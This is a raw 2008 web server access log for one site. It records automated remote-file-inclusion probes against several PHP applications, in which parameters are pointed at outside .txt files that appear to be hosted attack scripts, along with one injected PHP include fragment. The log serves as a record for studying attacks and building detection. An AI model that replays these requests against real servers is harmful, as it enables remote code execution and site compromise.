212.150.247.23 - - [29/Jul/2008:09:34:17 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 200 18413 "-" "libwww-perl/5.811" "www.dmulk.com"
208.186.78.5 - - [29/Jul/2008:09:34:32 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://67.223.229.149/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
208.186.78.5 - - [29/Jul/2008:09:34:32 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://67.223.229.149/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
208.186.78.5 - - [29/Jul/2008:09:34:32 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://67.223.229.149/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
200.99.76.3 - - [29/Jul/2008:09:34:38 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.99.76.3 - - [29/Jul/2008:09:34:39 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.22.94.70 - - [29/Jul/2008:09:34:42 -0700] "GET /logs/access_080329.log/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/popups/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.22.94.70 - - [29/Jul/2008:09:34:43 -0700] "GET /components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/popups/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.22.94.70 - - [29/Jul/2008:09:34:43 -0700] "GET /logs/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/popups/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:09:35:07 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:09:35:07 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:09:35:08 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
64.185.237.20 - - [29/Jul/2008:09:35:10 -0700] "GET /logs/access_080303.log//admin.php?cal_dir=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.185.237.20 - - [29/Jul/2008:09:35:10 -0700] "GET /logs//admin.php?cal_dir=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.185.237.20 - - [29/Jul/2008:09:35:46 -0700] "GET /logs/access_080208.log//admin.php?cal_dir=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
195.5.163.212 - - [29/Jul/2008:09:35:49 -0700] "GET /logs/access_071218.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://purearcade.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.56.49 - - [29/Jul/2008:09:36:11 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [29/Jul/2008:09:36:12 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 200 18445 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [29/Jul/2008:09:36:13 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.32.28.161 - - [29/Jul/2008:09:36:14 -0700] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.32.28.161 - - [29/Jul/2008:09:36:16 -0700] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 200 18551 "-" "libwww-perl/5.810" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:36:23 -0700] "GET /logs/access_080313.log/?sourcedir=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:36:23 -0700] "GET /logs/access_080313.log/?sourcedir=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:36:25 -0700] "GET /?sourcedir=http://artyficio.com/new/it.txt? HTTP/1.1" 200 18375 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:36:25 -0700] "GET /?sourcedir=http://artyficio.com/new/id.txt?? HTTP/1.1" 200 18365 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:36:26 -0700] "GET /logs/?sourcedir=http://artyficio.com/new/it.txt? HTTP/1.1" 200 58281 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:36:26 -0700] "GET /logs/?sourcedir=http://artyficio.com/new/id.txt?? HTTP/1.1" 200 58281 "-" "libwww-perl/5.811" "www.dmulk.com"
67.192.77.37 - - [29/Jul/2008:09:36:32 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:36:35 -0700] "GET /logs/?sourcedir=http://artyficio.com/new/id.txt?? HTTP/1.1" 200 58281 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:36:35 -0700] "GET /logs/?sourcedir=http://artyficio.com/new/it.txt? HTTP/1.1" 200 58281 "-" "libwww-perl/5.811" "www.dmulk.com"
67.192.77.37 - - [29/Jul/2008:09:36:35 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
67.192.77.37 - - [29/Jul/2008:09:36:36 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:36:37 -0700] "GET /?sourcedir=http://artyficio.com/new/id.txt?? HTTP/1.1" 200 18381 "-" "libwww-perl/5.811" "www.dmulk.com"
89.186.1.54 - - [29/Jul/2008:09:36:39 -0700] "GET /logs/access_080315.log%20/errors.php?error=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:36:39 -0700] "GET /?sourcedir=http://artyficio.com/new/it.txt? HTTP/1.1" 200 18359 "-" "libwww-perl/5.811" "www.dmulk.com"
207.45.177.194 - - [29/Jul/2008:09:36:55 -0700] "GET /logs/access_080303.log//admin.php?cal_dir=add%20this? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.45.177.194 - - [29/Jul/2008:09:36:55 -0700] "GET //admin.php?cal_dir=add%20this? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.45.177.194 - - [29/Jul/2008:09:36:55 -0700] "GET /logs//admin.php?cal_dir=add%20this? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.192.77.37 - - [29/Jul/2008:09:37:13 -0700] "GET /logs/access_080322.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.192.77.37 - - [29/Jul/2008:09:37:13 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.192.77.37 - - [29/Jul/2008:09:37:13 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.196.2.205 - - [29/Jul/2008:09:37:17 -0700] "GET /logs/access_080207.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.246.95.89 - - [29/Jul/2008:09:37:18 -0700] "GET /logs/access_071230.log/index1.php?choix=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.246.95.89 - - [29/Jul/2008:09:37:18 -0700] "GET /index1.php?choix=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.246.95.89 - - [29/Jul/2008:09:37:19 -0700] "GET /logs/index1.php?choix=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.246.95.89 - - [29/Jul/2008:09:37:22 -0700] "GET /logs/access_071230.log/index1.php?choix=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.246.95.89 - - [29/Jul/2008:09:37:22 -0700] "GET /logs/access_080207.log/index1.php?choix=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.246.95.89 - - [29/Jul/2008:09:37:23 -0700] "GET /index1.php?choix=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.246.95.89 - - [29/Jul/2008:09:37:23 -0700] "GET /logs/index1.php?choix=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.246.95.89 - - [29/Jul/2008:09:37:31 -0700] "GET /logs/access_080207.log/index1.php?choix=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [29/Jul/2008:09:37:33 -0700] "GET /logs/access_080207.log/index1.php?choix=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [29/Jul/2008:09:37:33 -0700] "GET /index1.php?choix=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [29/Jul/2008:09:37:34 -0700] "GET /logs/index1.php?choix=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.45.177.194 - - [29/Jul/2008:09:37:35 -0700] "GET /logs/access_080208.log//admin.php?cal_dir=add%20this? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.111.173.117 - - [29/Jul/2008:09:37:39 -0700] "GET /logs/access_080128.log/index1.php?choix=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:37:51 -0700] "GET /logs/access_080313.log/?sourcedir=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:37:52 -0700] "GET /?sourcedir=http://artyficio.com/new/id.txt?? HTTP/1.1" 200 18381 "-" "libwww-perl/5.811" "www.dmulk.com"
212.92.23.89 - - [29/Jul/2008:09:37:52 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.fieldpaoli.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [29/Jul/2008:09:37:52 -0700] "GET /logs/index1.php?choix=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:37:53 -0700] "GET /logs/?sourcedir=http://artyficio.com/new/id.txt?? HTTP/1.1" 200 58281 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.173.117 - - [29/Jul/2008:09:37:53 -0700] "GET /index1.php?choix=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:09:38:39 -0700] "GET /logs/access_080528.log/trans.php?trans=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:09:38:39 -0700] "GET /trans.php?trans=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:09:38:40 -0700] "GET /logs/trans.php?trans=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.246.95.89 - - [29/Jul/2008:09:38:47 -0700] "GET /logs/index1.php?choix=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.246.95.89 - - [29/Jul/2008:09:38:48 -0700] "GET /index1.php?choix=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:09:38:52 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.51.219.170 - - [29/Jul/2008:09:39:16 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://shra.net/rar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.219.170 - - [29/Jul/2008:09:39:16 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://shra.net/rar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.219.170 - - [29/Jul/2008:09:39:17 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://shra.net/rar.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.65" "www.dmulk.com"
59.126.46.141 - - [29/Jul/2008:09:39:29 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
203.130.242.135 - - [29/Jul/2008:09:39:35 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.130.242.135 - - [29/Jul/2008:09:39:35 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.126.46.141 - - [29/Jul/2008:09:39:35 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
203.130.242.135 - - [29/Jul/2008:09:39:36 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.apnic.net/index.html? HTTP/1.0" 200 3678 "-" "Mozilla/5.0" "www.dmulk.com"
203.130.242.135 - - [29/Jul/2008:09:39:36 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.apnic.net/index.html? HTTP/1.0" 200 3678 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.219.170 - - [29/Jul/2008:09:39:38 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://shra.net/rar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.59.181.100 - - [29/Jul/2008:09:39:38 -0700] "GET /logs/access_071225.log//include/write.php?dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.59.181.100 - - [29/Jul/2008:09:39:38 -0700] "GET /logs//include/write.php?dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.59.181.100 - - [29/Jul/2008:09:39:38 -0700] "GET //include/write.php?dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.192.77.37 - - [29/Jul/2008:09:39:48 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:09:40:25 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.14.123.10 - - [29/Jul/2008:09:40:26 -0700] "GET /logs/access_080303.log//admin.php?cal_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.101.37.20 - - [29/Jul/2008:09:40:30 -0700] "GET /logs/access_080218.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
64.72.112.142 - - [29/Jul/2008:09:40:45 -0700] "GET /logs/access_071225.log//include/write.php?dir=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.72.112.142 - - [29/Jul/2008:09:40:45 -0700] "GET /logs/access_080207.log//include/write.php?dir=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.72.112.142 - - [29/Jul/2008:09:40:45 -0700] "GET //include/write.php?dir=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.72.112.142 - - [29/Jul/2008:09:40:45 -0700] "GET /logs//include/write.php?dir=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.22.89.194 - - [29/Jul/2008:09:40:54 -0700] "GET //include/write.php?dir=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [29/Jul/2008:09:40:54 -0700] "GET /logs//include/write.php?dir=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.14.123.10 - - [29/Jul/2008:09:41:15 -0700] "GET /logs/access_080208.log//admin.php?cal_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.191.160.121 - - [29/Jul/2008:09:41:19 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
207.45.177.194 - - [29/Jul/2008:09:41:26 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.22.94.70 - - [29/Jul/2008:09:41:28 -0700] "GET /logs/access_080306.log/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/popups/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.99.76.3 - - [29/Jul/2008:09:41:37 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.99.76.3 - - [29/Jul/2008:09:41:38 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:09:41:39 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:09:41:39 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.6.242 - - [29/Jul/2008:09:41:40 -0700] "GET /logs/access_080118.log//modules/TotalCalendar/about.php?inc_dir=http://moisidis.gr/siteframe/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.6.242 - - [29/Jul/2008:09:41:41 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://moisidis.gr/siteframe/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:09:41:41 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:09:41:41 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.6.242 - - [29/Jul/2008:09:41:41 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://moisidis.gr/siteframe/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:09:41:43 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:09:41:43 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.234.103 - - [29/Jul/2008:09:41:46 -0700] "GET //include/write.php?dir=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.44.234.103 - - [29/Jul/2008:09:41:47 -0700] "GET /logs/access_071225.log//include/write.php?dir=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.44.234.103 - - [29/Jul/2008:09:41:47 -0700] "GET /logs//include/write.php?dir=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.44.234.103 - - [29/Jul/2008:09:41:47 -0700] "GET /logs/access_080207.log//include/write.php?dir=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.173.117 - - [29/Jul/2008:09:41:49 -0700] "GET /index1.php?choix=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.45.177.194 - - [29/Jul/2008:09:41:51 -0700] "GET /logs/access_080303.log//admin.php?cal_dir=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:41:51 -0700] "GET /logs/access_080218.log/?sourcedir=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.45.177.194 - - [29/Jul/2008:09:41:51 -0700] "GET /logs//admin.php?cal_dir=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:41:54 -0700] "GET /logs/access_080218.log/?sourcedir=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.246.95.89 - - [29/Jul/2008:09:42:00 -0700] "GET /index1.php?choix=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.28.127.255 - - [29/Jul/2008:09:42:02 -0700] "GET /logs/access_080114.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:42:03 -0700] "GET /logs/access_080218.log/?sourcedir=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.246.95.89 - - [29/Jul/2008:09:42:05 -0700] "GET /index1.php?choix=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [29/Jul/2008:09:42:21 -0700] "GET /logs/access_071225.log//include/write.php?dir=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:09:42:23 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:09:42:23 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
